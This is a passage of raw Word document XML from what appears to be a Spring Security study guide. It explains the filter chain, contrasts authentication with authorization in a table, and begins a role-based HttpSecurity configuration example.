          <w:ilvl w:val="0"/>
          <w:numId w:val="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ickjacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E183BB1" w14:textId="217B41F4" w:rsidR="005A6F56" w:rsidRPr="00CE4B95" w:rsidRDefault="005A6F56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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RL access restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEAE142" w14:textId="2C35165A" w:rsidR="002D20EE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C32F3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F85D479">
          <v:rect id="_x0000_i2139" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3681AA" w14:textId="5B5CBA80" w:rsidR="00CA332E" w:rsidRPr="00CE4B95" w:rsidRDefault="00724410" w:rsidP="00CA332E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="460" w:name="_Toc196307940"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring Security work internally</w:t>
      </w:r>
      <w:r w:rsidR="00CA332E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="460"/>
    </w:p>
    <w:p w14:paraId="77E65086" w14:textId="6B2A1C2A" w:rsidR="00CA332E" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA332E" w:rsidP="00D0720A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE2BDE4" w14:textId="77777777" w:rsidR="00AA2F7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chain of filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FilterChainProxy) to intercept HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D79CE9" w14:textId="278CB404" w:rsidR="00AA2F7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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filters include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5BB59F" w14:textId="77777777" w:rsidR="00AA2F7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="54"/>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rnamePasswordAuthenticationFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532E993" w14:textId="77777777" w:rsidR="00AA2F7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="54"/>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asicAuthenticationFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADBCD59" w14:textId="77777777" w:rsidR="00AA2F7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="54"/>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curityContextPersistenceFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A2082F" w14:textId="429F92B6" w:rsidR="00AA2F7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="54"/>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ceptionTranslationFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A92EE" w14:textId="77777777" w:rsidR="00AA2F7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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uthentication is handled by AuthenticationManager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82CDD4" w14:textId="04124701" w:rsidR="00AA2F7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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pon success, an Authentication object is stored in the SecurityContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B16AA6" w14:textId="675599FD" w:rsidR="00CA332E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D0720A">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0188290">
          <v:rect id="_x0000_i2140" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECCF628" w14:textId="22BBE92A" w:rsidR="00894AF5" w:rsidRPr="00CE4B95" w:rsidRDefault="00495BC9" w:rsidP="00894AF5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="461" w:name="_Toc196307941"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between Authentication </w:t>
      </w:r>
      <w:r w:rsidR="00F123A3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authorization</w:t>
      </w:r>
      <w:r w:rsidR="00894AF5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="461"/>
    </w:p>
    <w:p w14:paraId="080C39D2" w14:textId="56B80E56" w:rsidR="00894AF5" w:rsidRPr="00CE4B95" w:rsidRDefault="00894AF5" w:rsidP="00894AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB356CC" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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Authentication vs Authoriz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38"/>
        <w:gridCol w:w="4159"/>
        <w:gridCol w:w="3518"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="7CA8002A" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D15C599" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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ncept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="574A513A" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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uthentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="591B0552" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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uthorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="72415BF6" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="541B423E" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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finition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34C92F72" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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erifying who the user is</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="252E09F9" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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termining what the user can access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="3CEEB28B" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5071E9A6" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D1D53C1" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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gging in with username &amp; password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2922F3C6" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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hecking if the user can access /admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="56E64B61" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C446081" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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Question Answered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5636FED1" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Are you the right user?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16DA7C7B" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Do you have permission?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="797A9713" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BE6BA21" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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it Happens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D7F616D" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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fore authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AC9597A" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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fter authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="6C8A593B" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F02BA79" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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ndled via</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56B8967D" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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redentials (e.g., username, password, token)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02720DDC" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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oles, permissions, policies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="1E48F294" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="128E2200" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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utcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71BB2440" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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r identity is confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="336AABAE" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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ccess is granted or denied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F8ECC5D" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E05B5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B5038B2">
          <v:rect id="_x0000_i2141" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5442F941" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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Authentication Flow (Spring Boot Example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF7FAF7" w14:textId="77777777" w:rsidR="008273D5" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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r logs in via /login (form, basic auth, OAuth, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E83E3" w14:textId="77777777" w:rsidR="008273D5" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Security authenticates using a configured provider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC267E3" w14:textId="77777777" w:rsidR="008273D5" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00581E2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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rDetailsService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18450B" w14:textId="77777777" w:rsidR="008273D5" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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wtAuthenticationFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F55AFC" w14:textId="55085100" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Auth2Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB0603F" w14:textId="72F2745E" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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successful, a SecurityContext is established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25691D8A" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E05B5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F9BE420">
          <v:rect id="_x0000_i2142" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9F0A01" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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Authorization Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D389EE0" w14:textId="77777777" w:rsidR="00D37131" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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fter authentication, Spring checks what resources the user is allowed to access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65733D8B" w14:textId="180F478D" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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is controlled using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6BA861" w14:textId="77777777" w:rsidR="00D37131" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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eAuthorize("hasRole('ADMIN')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FE0A0B" w14:textId="77777777" w:rsidR="00D37131" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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ttp.authorizeRequests() in the config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D393A" w14:textId="5F61621E" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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ole or permission-based policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520796FB" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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Example in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC1558" w14:textId="77777777" w:rsidR="00753CC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00753CC8" w:rsidP="00E05B58">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E15F1CA"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE9BA9B"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@EnableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A8BF8D"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curityConfig</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extend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WebSecurityConfigurerAdapt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BC945CA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13870764"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3E3332DD"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otected</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configure</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HttpSecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> htt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row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Excepti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D331037"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xml:space="preserve">        http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B01F635"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uthorizeRequests</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554F1C21"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ntMatchers</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dmi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hasRol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DMIN"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F705C3"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ntMatchers</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us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hasAnyRol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US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DMIN"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA4F9A2"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nyReque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uthenticated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0995FE"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nd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CBF875"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ormLogin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
